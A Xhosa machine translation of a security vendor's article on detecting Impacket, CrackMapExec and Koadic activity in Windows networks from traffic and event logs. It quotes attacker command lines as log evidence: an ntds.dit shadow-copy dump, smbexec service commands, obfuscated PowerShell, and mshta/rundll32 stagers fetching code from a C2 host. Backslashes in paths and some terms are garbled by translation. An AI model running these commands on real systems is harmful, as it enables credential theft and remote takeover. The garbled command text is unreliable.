ProHoster > Ibhulogi > Ulawulo > Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi

Inani lokuhlaselwa kwicandelo loshishino likhula minyaka yonke: umzekelo ngo 2017, 13% ngakumbi iziganeko ezizodwa zabhalwa kunokuba ngo-2016, kwaye ekupheleni kuka-2018 - I-27% yeziganeko ezingaphezulu, kunakwixesha elidlulileyo. Kubandakanya ezo apho inkqubo yokusebenza iyeyona sixhobo siphambili sokusebenza WindowsNgowama-2017-2018, i-APT Dragonfly, i-APT28, APT MuddyWater benze uhlaselo kurhulumente kunye nemibutho yomkhosi eYurophu, kuMntla Merika naseSaudi Arabia. Kwaye sasebenzisa izixhobo ezithathu kule nto- Impacket, CrackMapExec и Koadic. Ikhowudi yabo yomthombo ivulekile kwaye iyafumaneka kwi-GitHub.

Kuyafaneleka ukuba uqaphele ukuba ezi zixhobo azisetyenziselwa ukungena okokuqala, kodwa ukuphuhlisa ukuhlaselwa ngaphakathi kweziseko zophuhliso. Abahlaseli bawasebenzisa kumanqanaba ahlukeneyo ohlaselo emva kokungena komjikelezo. Oku, ngendlela, kunzima ukukubona kwaye kaninzi kuphela ngoncedo lweteknoloji ukuchonga imikhondo yokulalanisa kwitrafikhi yothungelwano okanye izixhobo ezivumelayo Fumana iintshukumo ezisebenzayo zomhlaseli emva kokuba engene kwisiseko. Izixhobo zibonelela ngemisebenzi eyahlukeneyo, ukusuka ekudluliseleni iifayile ekusebenzisaneni kunye nerejista kunye nokwenza imiyalelo kumatshini okude. Senze uphononongo ngezi zixhobo ukumisela umsebenzi wabo womnatha.

Oko bekufuneka sikwenze:

  • Qonda ukuba zisebenza njani izixhobo zokuqhekeza. Fumana ukuba ngabaphi abahlaseli kufuneka baxhaphaze kwaye bubuphi ubuchwephesha abanobusebenzisa.
  • Fumana into engabonwanga ngezixhobo zokhuseleko lolwazi kwizigaba zokuqala zohlaselo. Isigaba sokuhlaziya sinokunqunyulwa, mhlawumbi ngenxa yokuba umhlaseli ungumhlaseli wangaphakathi, okanye ngenxa yokuba umhlaseli usebenzisa umngxuma kwisiseko esingaziwa ngaphambili. Kuba kunokwenzeka ukubuyisela yonke ikhonkco lezenzo zakhe, ngoko ke umnqweno wokubona ukunyakaza okuqhubekayo.
  • Ukuphelisa iimpembelelo zobuxoki kwizixhobo zokubona ukungena. Akufanele sikhohlwe ukuba xa izenzo ezithile zifunyenwe ngesiseko sokuhlaziywa kuphela, iimpazamo eziqhelekileyo zinokwenzeka. Ngokuqhelekileyo kwiziseko zophuhliso kukho inani elaneleyo leendlela, ezingabonakaliyo kwizinto ezisemthethweni ekuboneni kokuqala, ukufumana naluphi na ulwazi.

Ezi zixhobo zibanika ntoni abahlaseli? Ukuba le yi-Impacket, ke abahlaseli bafumana ilayibrari enkulu yeemodyuli ezinokuthi zisetyenziswe kumanqanaba ahlukeneyo ohlaselo olulandelayo emva kokuphula i-perimeter. Izixhobo ezininzi zisebenzisa iimodyuli ze-Impacket ngaphakathi - umzekelo, iMetasploit. Ine-dcomexec kunye ne-wmiexec yokuphunyezwa komyalelo okude, i-secretsdump yokufumana ii-akhawunti kwimemori ezongeziweyo kwi-Impacket. Ngenxa yoko, ukufumanisa okuchanekileyo komsebenzi wethala leencwadi kuya kuqinisekisa ukufunyanwa kwezinto eziphuma kuzo.

Akumangalisi ukuba abadali babhale "Ixhaswe yi-Impacket" malunga ne-CrackMapExec (okanye i-CME ngokulula). Ukongeza, i-CME inomsebenzi osele ulungele iimeko ezidumileyo: I-Mimikatz yokufumana amagama ayimfihlo okanye i-hashes yabo, ukuphunyezwa kwe-Meterpreter okanye i-empire agent ukwenzela ukubulawa kude, kunye ne-Bloodhound ebhodini.

Isixhobo sesithathu esisikhethileyo yiKoadic. Sitsha kakhulu, emva kokuba siboniswe kwingqungquthela yamazwe ngamazwe ye-hacker i-DEFCON 25 ngo-2017, kwaye sinendlela engaqhelekanga: sisebenza nge-HTTP, iJavaScript, kunye neMicrosoft Visual Basic Script (VBS). Le ndlela ibizwa ngokuba kukuphila ngomhlaba: esi sixhobo sisebenzisa iseti yokuxhomekeka kunye neelayibrari ezakhelwe kuyo. WindowsAbadali bayibiza ngokuba yiCOM Command & Control, okanye iC3.

IMPACKET

Ukusebenza kwe-Impacket kubanzi kakhulu, ukusuka ekuhloleni ngaphakathi kwe-AD kunye nokuqokelelwa kwedatha kwiiseva zangaphakathi ze-MS SQL ukuya kwiindlela zokufumana iziqinisekiso, kubandakanya ukuhlaselwa kwe-SMB relay kunye nokubuyisa ifayile ye-ntds.dit equlethe ii-password hashes zomsebenzisi kwi-domain controller. I-Impacket ikwasebenzisa imiyalelo ekude isebenzisa iindlela ezine ezahlukeneyo: i-WMI, inkonzo yolawulo lweshedyuli, kunye nokunye. Windows, i-DCOM kunye ne-SMB, kwaye ifuna iziqinisekiso zokwenza oku.

Ukulahla okufihlakeleyo

Makhe sijonge kwi-secrets dump. Le yimodyuli enokuthi ijolise kubo bobabini oomatshini bomsebenzisi kunye nabalawuli besizinda. Ingasetyenziselwa ukufumana iikopi zeendawo zememori LSA, SAM, SECURITY, NTDS.dit, ngoko inokubonwa kwizigaba ezahlukeneyo zohlaselo. Inyathelo lokuqala ekusebenzeni kwemodyuli kukuqinisekiswa nge-SMB, efuna nokuba igama eligqithisiweyo lomsebenzisi okanye i-hash yayo ngokuzenzekelayo iqhube uhlaselo lweHash ngokuzenzekelayo. Okulandelayo kuza isicelo sokuvula ukufikelela kuMphathi woLawulo lweNkonzo (SCM) kwaye ufumane ukufikelela kwirejista ngokusebenzisa i-protocol ye-winreg, esebenzisa apho umhlaseli angakwazi ukufumana idatha yamasebe omdla kwaye afumane iziphumo nge-SMB.

KwiFig. 1 sibona ukuba ngokuchanekileyo xa usebenzisa i-protocol ye-winreg, ukufikelela kufumaneka ngokusebenzisa iqhosha lokubhalisa kunye ne-LSA. Ukwenza oku, sebenzisa umyalelo we-DCERPC nge-opcode 15-OpenKey.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 1. Ukuvula iqhosha lokubhalisa usebenzisa iprotocol ye-winreg

Okulandelayo, xa ukufikelela kwisitshixo kufunyenwe, amaxabiso agcinwa ngomyalelo we-SaveKey nge-opcode 20. I-Impacket yenza oku ngendlela ecacileyo. Igcina amaxabiso kwifayile egama layo linguluhlu lwamagama asi-8 ahlonyelwe nge .tmp. Ukongeza, ukulayishwa okungaphezulu kwale fayile kwenzeka nge-SMB kwi-System32 directory (Fig. 2).

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 2. Inkqubo yokufumana isitshixo sobhaliso kumatshini okude

Kuvela ukuba umsebenzi onjalo kuthungelwano unokufunyanwa ngemibuzo kumasebe athile obhaliso usebenzisa i-protocol ye-winreg, amagama athile, imiyalelo kunye nomyalelo wabo.

Le modyuli ikwashiya umkhondo kwi-event log. Windows, ngenxa yoko kulula ukuyifumana. Umzekelo, ngenxa yokuphumeza umyalelo

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

kwijenali Windows Server Unyaka ka-2016 uza kuba nolu landelelwano lulandelayo lweziganeko:

1. 4624 - ekude Logon.
2. 5145 - ukujonga amalungelo okufikelela kwinkonzo ekude ye-winreg.
3. 5145 - ukujonga amalungelo okufikelela kwifayile kwi-System32 directory. Ifayile inegama elingaqhelekanga elikhankanywe ngasentla.
4. 4688 - ukwenza inkqubo ye-cmd.exe evula i-vsadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ukwenza inkqubo ngomyalelo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ukwenza inkqubo ngomyalelo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ukwenza inkqubo ngomyalelo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Njengezixhobo ezininzi zokuxhaphaza emva, i-Impacket ineemodyuli zokwenza imiyalelo ekude. Siza kugxila kwi-smbexec, ebonelela ngeqokobhe lomyalelo osebenzayo kumatshini okude. Le modyuli ikwafuna uqinisekiso nge-SMB, nokuba kungegama lokugqitha okanye igama lokugqitha. Kumfanekiso. Kwi-Figure 3 sibona umzekelo wendlela isixhobo esinjalo sisebenza ngayo, kulo mzekelo ngumlawuli wendawo we-console.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 3. Interactive smbexec console

Inyathelo lokuqala le-smbexec emva kokuqinisekiswa kukuvula i-SCM ngomyalelo we-OpenSCManagerW (15). Umbuzo uphawuleka: indawo yeGama loMshini ngu-DUMMY.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 4. Isicelo sokuvula uMphathi woLawulo lweNkonzo

Emva koko, inkonzo yenziwa ngokusebenzisa i-CreateServiceW umyalelo (12). Kwimeko ye-smbexec, sinokubona umyalelo ofanayo wokwakha umyalelo rhoqo. KwiFig. I-5 eluhlaza ibonisa iiparamitha zomyalelo ezingatshintshiyo, umthubi ubonisa ukuba umhlaseli unokutshintsha ntoni. Kulula ukubona ukuba igama lefayile ephunyeziweyo, ulawulo lwayo kunye nefayile yemveliso inokutshintshwa, kodwa okunye kunzima kakhulu ukutshintsha ngaphandle kokuphazamisa ingqiqo ye-Impacket module.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 5. Isicelo sokwenza inkonzo usebenzisa uMphathi woLawulo lweNkonzo

I-Smbexec ikwashiya imiqondiso ecacileyo kwi-event log. WindowsKwimagazini Windows Server Ngo-2016 kwi-shell yomyalelo osebenzisanayo nomyalelo we-ipconfig sibona ulandelelwano oluphambili lweziganeko:

1. 4697 - ukufakwa kwenkonzo kumatshini wexhoba:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ukudalwa kwenkqubo ye-cmd.exe kunye neengxabano ezivela kwinqaku loku-1.
3. 5145 - ukujonga amalungelo okufikelela kwi-__output file kwi C$ directory.
4. 4697 - ukufakwa kwenkonzo kumatshini wexhoba.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ukudalwa kwenkqubo ye-cmd.exe kunye neengxabano ezivela kwinqaku loku-4.
6. 5145 - ukujonga amalungelo okufikelela kwi-__output file kwi C$ directory.

I-Impacket sisakhelo sokuphuhlisa izixhobo zokuhlasela. Ixhasa phantse zonke iiprotokholi ku Windows-izakhiwo kodwa ke zineempawu zazo ezahlukileyo. Ezi ziquka imibuzo ethile ye-winreg, ukusetyenziswa kwe-SCM API enesakhiwo sayo somyalelo, ifomathi yegama lefayile, kunye ne-SMB share SYSTEM32.

CRACKMAPEXEC

Isixhobo se-CME senzelwe ukuba sizenze ngokuzenzekelayo ezo ntshukumo zesiqhelo ekufuneka umhlaseli enze ngazo ukuqhubela phambili ngaphakathi kuthungelwano. Ikuvumela ukuba usebenze ngokubambisana nearhente eyaziwayo ye-Empire kunye ne-Meterpreter. Ukwenza imiyalelo ngokufihlakeleyo, i-CME inokuyiphazamisa. Ukusebenzisa i-Bloodhound (isixhobo esahlukileyo sokuhlaziya), umhlaseli angenza ngokuzenzekelayo ukukhangela iseshoni yomlawuli wesizinda esisebenzayo.

Igazi

I-Bloodhound, njengesixhobo esizimeleyo, ivumela ukuqwalaselwa okuphambili ngaphakathi kwenethiwekhi. Iqokelela idatha malunga nabasebenzisi, oomatshini, amaqela, iiseshoni kwaye inikezelwa njengeskripthi se-PowerShell okanye ifayile yokubini. I-LDAP okanye i-SMB-based protocols isetyenziselwa ukuqokelela ulwazi. Imodyuli yokudibanisa i-CME ivumela i-Bloodhound ukuba ikhutshwe kumatshini wexhoba, iqhube kwaye ifumane idatha eqokelelweyo emva kokubulawa, ngokwenza oko ngokuzenzekelayo izenzo kwinkqubo kwaye ibenze bangabonakali. Igobolondo lomzobo we-Bloodhound libonisa idatha eqokelelweyo ngendlela yeegrafu, ekuvumela ukuba ufumane eyona ndlela imfutshane ukusuka kumatshini womhlaseli ukuya kumlawuli wesizinda.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 6. I-Bloodhound Interface

Ukuze isebenze kumatshini wexhoba, imodyuli idala umsebenzi usebenzisa i-ATSVC kunye ne-SMB. I-ATSVC lujongano lokusebenza nomcwangcisi wemisebenzi. WindowsI-CME isebenzisa umsebenzi wayo we-NetrJobAdd (1) ukwenza imisebenzi ngenethiwekhi. Umzekelo wento ethunyelwa yi-CME module uboniswe kuMfanekiso 7: yi-cmd.exe command call kunye nekhowudi efihliweyo ngendlela yeengxoxo ze-XML.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Umfanekiso wesi-7. Ukwenza umsebenzi ngeCME

Emva kokuba umsebenzi uthunyelwe ukubulawa, umatshini wexhoba uqala i-Bloodhound ngokwayo, kwaye oku kunokubonwa kwi-traffic. Imodyuli ibonakaliswe yimibuzo ye-LDAP ukufumana amaqela asemgangathweni, uluhlu lwabo bonke oomatshini kunye nabasebenzisi kwi-domain, kwaye ufumane ulwazi malunga neeseshoni zomsebenzisi osebenzayo ngesicelo se-SRVSVC NetSessEnum.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 8. Ukufumana uluhlu lweeseshoni ezisebenzayo nge-SMB

Ukongeza, ukuqaliswa kwe-Bloodhound kumatshini wexhoba kunye nophicotho-zincwadi olunikwe amandla luhamba kunye nomsitho one-ID 4688 (ukudala inkqubo) kunye negama lenkqubo. «C:WindowsSystem32cmd.exe». Yintoni ephawulekayo ngayo ziingxoxo zomgca womyalelo:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Imodyuli ye-enum_avproducts inomdla kakhulu ngokwemisebenzi kunye nokusetyenziswa kwayo. I-WMI ikuvumela ukuba ufumane idatha kwizinto ezahlukeneyo usebenzisa ulwimi lwemibuzo ye-WQL. Windows, nto leyo esetyenziswa yile module ye-CME. Ivelisa imibuzo kwiiklasi ze-AntiSpywareProduct kunye ne-AntiMirusProduct malunga nezixhobo zokhuseleko ezifakwe kumatshini wexhoba. Ukuze ufumane idatha efunekayo, imodule iqhagamshela kwindawo yegama le-rootSecurityCenter2, emva koko ivelise umbuzo we-WQL kwaye ifumane impendulo. Umfanekiso 9 ubonisa umxholo wemibuzo neempendulo ezinjalo. Kumzekelo wethu, Windows Umkhuseli.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 9. Umsebenzi womnatha wemodyuli ye-enum_avproducts

Rhoqo, uphicotho lwe-WMI (Trace WMI-Activity), apho iziganeko onokufumana kuzo ulwazi oluluncedo malunga nemibuzo ye-WQL, lunokuvalwa. Kodwa ukuba yenziwe, ukuba iscript se-enum_avproducts siqhutywa, isiganeko esine-ID 11 siya kugcinwa siqulathe igama lomsebenzisi othumele isicelo kunye negama kwi-rootSecurityCenter2.

Imodyuli nganye ye-CME yayinezinto zayo zakudala, ingaba yimibuzo ethile ye-WQL okanye ukuyilwa kohlobo oluthile lomsebenzi kumcwangcisi wemisebenzi eno-obfuscation kunye nomsebenzi othe ngqo we-Bloodhound kwi-LDAP kunye ne-SMB.

KOADIC

Uphawu olwahlukileyo lweKoadic kukusetyenziswa kwezinto ezakhelwe ngaphakathi Windows Abatoliki beJavaScript kunye neVBScript. Ngale ndlela, ilandela umkhwa wokuphila ngomhlaba—oko kukuthi, ayinazo izinto ezixhomekeke ngaphandle kwaye isebenzisa izixhobo eziqhelekileyo. WindowsEsi sisixhobo esipheleleyo seCommand & Control (CnC), njengoko emva kokosuleleka, kufakwa "i-implant" kumatshini, nto leyo evumela ukuba ilawulwe. Umatshini onjalo, ngokwegama likaKoadic, ubizwa ngokuba yi "zombie." Ukuba ixhoba alinawo amalungelo aneleyo okusebenza ngokupheleleyo, iKoadic inokuyiphakamisa isebenzisa iindlela ze-UAC bypass.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 10. I-Koadic Shell

Ixhoba kufuneka liqalise unxibelelwano kunye noMyalelo nomncedisi woLawulo. Ukwenza oku, kufuneka aqhagamshelane ne-URI elungiselelwe ngaphambili kwaye afumane umzimba oyintloko we-Koadic usebenzisa enye yesiteji. Kumfanekiso. Umfanekiso we-11 ubonisa umzekelo we-stager ye-mshta.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 11. Ukuqalisa iseshoni ngeseva ye-CnC

Ngokusekwe kulwahlulo lwempendulo ye-WS, kuyacaca ukuba uphumezo lwenzeka nge-WScript.Shell, kwaye ii-variables STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ziqulathe ulwazi olungundoqo malunga neeparamitha zeseshoni yangoku. Esi sisibini sokuqala sempendulo kuqhagamshelwano lweHTTP kunye nomncedisi we CnC. Izicelo ezilandelayo zinxulumene ngokuthe ngqo nokusebenza kweemodyuli ezibizwa ngokuba (iimplants). Zonke iimodyuli ze-Koadic zisebenza kuphela ngeseshoni esebenzayo kunye ne-CnC.

IMimikatz

Kanye njengokuba i-CME isebenza kunye ne-Bloodhound, i-Koadic isebenza kunye ne-Mimikatz njengenkqubo eyahlukileyo kwaye ineendlela ezininzi zokuyisungula. Apha ngezantsi kukho isibini sempendulo yesicelo sokukhuphela ukufakelwa kweMimikatz.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 12. Dlulisa i-Mimikatz kwi-Koadic

Ungabona indlela i-URI ifomathi kwisicelo etshintshile ngayo. Ngoku iqulethe ixabiso le-csrf variable, enoxanduva lwemodyuli ekhethiweyo. Musa ukukhangela kwigama lakhe; Sonke siyazi ukuba iCSRF ihlala iqondwa ngokwahlukileyo. Impendulo yayingumzimba ofanayo we-Koadic, apho ikhowudi ehambelana ne-Mimikatz yongezwa. Inkulu kakhulu, ngoko ke makhe sijonge amanqaku aphambili. Apha sinelayibrari ye-Mimikatz efakwe kwi-base64, iklasi ye-serialized .NET eya kuyifaka, kunye neengxabano zokusungula i-Mimikatz. Isiphumo sokwenziwa sigqithiselwa kwinethiwekhi ngokubhaliweyo okucacileyo.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 13. Isiphumo sokusebenzisa iMimikatz kumatshini okude

Exec_cmd

I-Koadic ikwanazo neemodyuli ezinokwenza imiyalelo ukude. Apha siza kubona indlela yokuvelisa i-URI efanayo kunye ne-sid eqhelekileyo kunye ne-csrf variables. Kwimeko yemodyuli exec_cmd, ikhowudi yongezwa kumzimba okwaziyo ukwenza imiyalelo yeqokobhe. Ngezantsi kuboniswa ikhowudi enjalo equlethwe kwimpendulo ye-HTTP yomncedisi we-CnC.

Indlela yokubona uhlaselo kwi Windows-iziseko zophuhliso: ukufunda izixhobo zabaphangi
Irayisi. 14. Faka ikhowudi exec_cmd

I-GAWTUUGCFI eguquguqukayo kunye nophawu lwe-WS oluqhelekileyo luyafuneka kuphunyezo lwekhowudi. Ngoncedo lwayo, i-implant ibiza i-shell, iqhubekisela phambili amasebe amabini ekhowudi - i-shell.exec kunye nokubuyiswa komlambo wedatha ophumayo kunye ne-shell.run ngaphandle kokubuya.

I-Koadic ayisosixhobo esiqhelekileyo, kodwa inezinto zayo zakudala apho inokufumaneka khona kwitrafikhi esemthethweni:

  • ukwenziwa okukhethekileyo kwezicelo zeHTTP,
  • usebenzisa i-winHttpRequests API,
  • ukwenza into yeWscript.Shell ngeActiveXObject,
  • umzimba omkhulu ophunyezwayo.

Uqhagamshelwano lokuqala luqaliswa yi-stager, ngoko ke kunokwenzeka ukubona umsebenzi wayo ngeziganeko. WindowsKwi-mshta, le yi-event 4688, ebonisa ukudalwa kwenkqubo ene-startup attribute:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Ngelixa i-Koadic iqhuba, unokubona ezinye iziganeko ze-4688 ezineempawu ezibonisa ngokugqibeleleyo:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ezifunyanisiweyo

Umkhwa wokuphila ngomhlaba uya uthandwa kakhulu zizigebenga. Basebenzisa izinto ezakhelwe ngaphakathi Windows izixhobo kunye neendlela ezihambelana neemfuno zabo. Sibona izixhobo ezidumileyo ezifana neKoadic, CrackMapExec, kunye ne-Impacket, ezilandela lo mgaqo, zibonakala ngakumbi kwiingxelo ze-APT. Inani leefolokhwe zezi zixhobo kwiGitHub nalo liyakhula, kwaye ezintsha ziyavela (okwangoku kukho malunga newaka lazo). Le ndlela iyanda ngenxa yobulula bayo: abahlaseli abazidingi izixhobo zomntu wesithathu; sele zikhona kwiimashini zamaxhoba kwaye zibanceda badlule amanyathelo okhuseleko. Sigxila ekufundeni ukusebenzisana kwenethiwekhi: isixhobo ngasinye esichazwe apha ngasentla sishiya umkhondo waso kwitrafikhi yenethiwekhi; ukuzifunda ngokweenkcukacha kusivumele ukuba siqeqeshe imveliso yethu. I-PT Network Attack Discovery babhaqe, nto leyo enceda ekugqibeleni ukuphanda lonke ikhonkco lezehlo ze-cyber ezibandakanya bona.

Authors:

  • U-Anton Tyurin, iNtloko yeSebe leeNkonzo zeNgcali, i-PT Expert Security Centre, i-Positive Technologies
  • U-Egor Podmokov, ingcali, i-PT Expert Security Centre, i-Positive Technologies

umthombo: www.habr.com

Thenga ukusingathwa okuthembekileyo kwiindawo ezinokhuseleko lweDDoS, iiseva zeVPS VDS 🔥 Thenga ukusingathwa kwewebhusayithi okuthembekileyo ngokhuseleko lwe-DDoS, iiseva zeVPS VDS | ProHoster